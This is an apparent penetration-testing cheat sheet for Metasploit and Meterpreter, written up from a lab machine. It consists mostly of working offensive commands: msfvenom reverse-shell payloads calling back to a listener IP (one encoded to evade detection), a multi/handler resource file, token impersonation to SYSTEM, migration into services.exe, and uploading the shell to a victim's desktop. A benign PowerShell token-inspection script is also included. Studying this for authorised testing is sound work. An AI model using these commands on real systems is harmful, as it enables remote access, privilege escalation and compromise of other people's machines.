
Metasploit / Meterpreter

Modules

List of modules:

  • espia
  • incognito: allows you to impersonate user tokens.
  • lanattacks
  • powershell: enables PowerShell (interactive shell, single command, ...).
  • python
  • stdapi
  • winpmem
  • extapi
  • kiwi
  • peinjector
  • priv
  • sniffer
  • unhook

Incognito

meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\IIS_IUSRS
BUILTIN\Users
[...]
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Powershell

meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell

PS > . .\PowerUp.ps1
PS > Invoke-AllChecks
[...]

Msfvenom

List payloads: msfvenom --list payload

# Windows (EXE)
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 \
    -f exe -o shell.exe

# Windows (x86 EXE with encoder)
$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai \
    LHOST=10.9.52.138 LPORT=9001 -f exe -o shell.exe

# Linux (ELF)
$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 \
    -f elf -o shell.bin

  • staged: the payload is delivered in two parts; a small stager connects back first, then the listener sends it the rest of the payload (the stage). In Metasploit payload names this is the slash form, e.g. windows/meterpreter/reverse_tcp.
  • stageless: the complete reverse shell is embedded in the payload itself. This is the underscore form, e.g. windows/x64/meterpreter_reverse_tcp.

Resource file

File msf.rc:

use exploit/multi/handler
set LHOST tun0
set LPORT 9001
set payload windows/x64/meterpreter_reverse_tcp
exploit -j

Command: msfconsole -r msf.rc

Migrate to a process

More information about the migrate command.

Even though you have a higher privileged token, you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions: it uses the primary token of the process, not the impersonated token, to determine what the process can or cannot do). Ensure that you migrate to a process with the correct permissions.

meterpreter > ps | grep services
Filtering on 'services'

Process List
============

 PID  PPID  Name          Arch  Session  User                 Path
 ---  ----  ----          ----  -------  ----                 ----
 668  580   services.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\services.exe

meterpreter > migrate 668
[*] Migrating from 996 to 668...
[*] Migration completed successfully.
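The primary-token versus impersonation-token distinction above can be inspected from PowerShell. This is an added example, not part of the original page or of Metasploit: it reads the user of the current process's primary token and of the current thread's impersonation token (if any) through P/Invoke to advapi32. The self-impersonation step at the end assumes Windows PowerShell 5.1 (.NET Framework), where WindowsIdentity.Impersonate() is available.

```powershell
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class TokenNative {
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenThreadToken(IntPtr ThreadHandle, uint DesiredAccess, bool OpenAsSelf, out IntPtr TokenHandle);
    [DllImport("kernel32.dll")] public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll")] public static extern IntPtr GetCurrentThread();
    [DllImport("kernel32.dll")] public static extern bool CloseHandle(IntPtr Handle);
}
"@

function Get-TokenUser {
    param([IntPtr]$Token)
    # WindowsIdentity resolves the token's user SID to DOMAIN\name.
    return (New-Object System.Security.Principal.WindowsIdentity($Token)).Name
}

function Get-TokenSummary {
    $TOKEN_QUERY = 0x0008
    $result = [ordered]@{ Primary = $null; Impersonation = $null }
    $hProc = [IntPtr]::Zero
    if ([TokenNative]::OpenProcessToken([TokenNative]::GetCurrentProcess(), $TOKEN_QUERY, [ref]$hProc)) {
        $result.Primary = Get-TokenUser $hProc   # what access checks on the process use
        [void][TokenNative]::CloseHandle($hProc)
    }
    $hThread = [IntPtr]::Zero
    # OpenAsSelf = $true: perform the access check with the process token, so the call
    # still succeeds when the thread impersonates a less privileged identity.
    if ([TokenNative]::OpenThreadToken([TokenNative]::GetCurrentThread(), $TOKEN_QUERY, $true, [ref]$hThread)) {
        $result.Impersonation = Get-TokenUser $hThread   # what getuid-style calls report
        [void][TokenNative]::CloseHandle($hThread)
    } else {
        # ERROR_NO_TOKEN (1008): the thread is not impersonating, so access checks
        # and any child process fall back to the primary token.
        $result.Impersonation = "none (Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error()))"
    }
    return $result
}

"Before impersonation:"; Get-TokenSummary
# Windows PowerShell 5.1 only: impersonating our own identity puts a token on the
# thread while the primary token stays unchanged, the situation described above.
$ctx = [System.Security.Principal.WindowsIdentity]::GetCurrent().Impersonate()
try { "During impersonation:"; Get-TokenSummary } finally { $ctx.Undo() }
```

Run it in an elevated and in a normal shell to see that the primary token never follows the thread's impersonation state, which is why migrating into a process that already holds the wanted primary token matters more than the token getuid displays.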

Search for files

meterpreter > search -f shell.exe
Found 1 result...
=================

Path                              Size (bytes)  Modified (UTC)
----                              ------------  --------------
c:\Users\bruce\Desktop\shell.exe  73802         2021-12-11 12:20:17 +0100

Upload / Download

meterpreter > download shell.exe
[*] Downloading: shell.exe -> /home/.../alfred/shell.exe
[*] Downloaded 72.07 KiB of 72.07 KiB (100.0%): shell.exe -> /home/.../alfred/shell.exe
[*] download   : shell.exe -> /home/.../alfred/shell.exe

meterpreter > upload shell.exe 'c:\Users\bruce\Desktop\reverse.exe'
[*] uploading  : /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe
[*] uploaded   : /home/.../alfred/shell.exe -> c:\Users\bruce\Desktop\reverse.exe